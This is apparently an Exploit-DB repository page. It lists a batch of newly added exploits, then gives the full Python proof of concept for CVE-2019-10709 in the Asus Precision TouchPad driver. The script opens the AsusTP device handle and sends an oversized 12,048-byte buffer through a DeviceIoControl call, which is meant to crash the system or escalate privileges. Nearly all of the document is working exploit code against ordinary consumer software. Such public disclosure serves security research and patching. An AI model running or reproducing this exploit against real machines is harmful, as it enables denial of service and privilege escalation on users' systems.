b4225f5fa8
12 changes to exploits/shellcodes SQL Server Password Changer 1.90 - Denial of Service Easy MP3 Downloader 4.7.8.8 - 'Unlock Code' Denial of Service Asus Precision TouchPad 11.0.0.25 - Denial of Service VX Search Enterprise 10.4.16 - 'User-Agent' Denial of Service Canon PRINT 2.5.5 - Information Disclosure QEMU - Denial of Service Sentrifugo 3.2 - File Upload Restriction Bypass Sentrifugo 3.2 - Persistent Cross-Site Scripting DomainMod 4.13 - Cross-Site Scripting YouPHPTube 7.4 - Remote Code Execution WordPress Plugin WooCommerce Product Feed 2.2.18 - Cross-Site Scripting
24 lines
No EOL
842 B
Python
Executable file
24 lines
No EOL
842 B
Python
Executable file
#!/usr/bin/python
|
|
# Exploit Title: Asus Precision TouchPad 11.0.0.25 - DoS/Privesc
|
|
# Date: 29-08-2019
|
|
# Exploit Author: Athanasios Tserpelis of Telspace Systems
|
|
# Vendor Homepage: https://www.asus.com
|
|
# Version: 11.0.0.25
|
|
# Software Link : https://www.asus.com
|
|
# Contact: services[@]telspace.co.za
|
|
# Twitter: @telspacesystems (Greets to the Telspace Crew)
|
|
# Tested on: Windows 10 RS5 x64
|
|
# CVE: CVE-2019-10709
|
|
|
|
from ctypes import *
|
|
kernel32 = windll.kernel32
|
|
ntdll = windll.ntdll
|
|
NULL = 0
|
|
hevDevice = kernel32.CreateFileA("\\\\.\\AsusTP", 0xC0000000, 0, None, 0x3, 0, None)
|
|
if not hevDevice or hevDevice == -1:
|
|
print "*** Couldn't get Device Driver handle."
|
|
sys.exit(0)
|
|
|
|
buf = "A"*12048
|
|
raw_input("Press Enter to Trigger Vuln")
|
|
kernel32.DeviceIoControl(hevDevice, 0x221408, buf, 0x1, buf, 0x1 , 0, NULL) |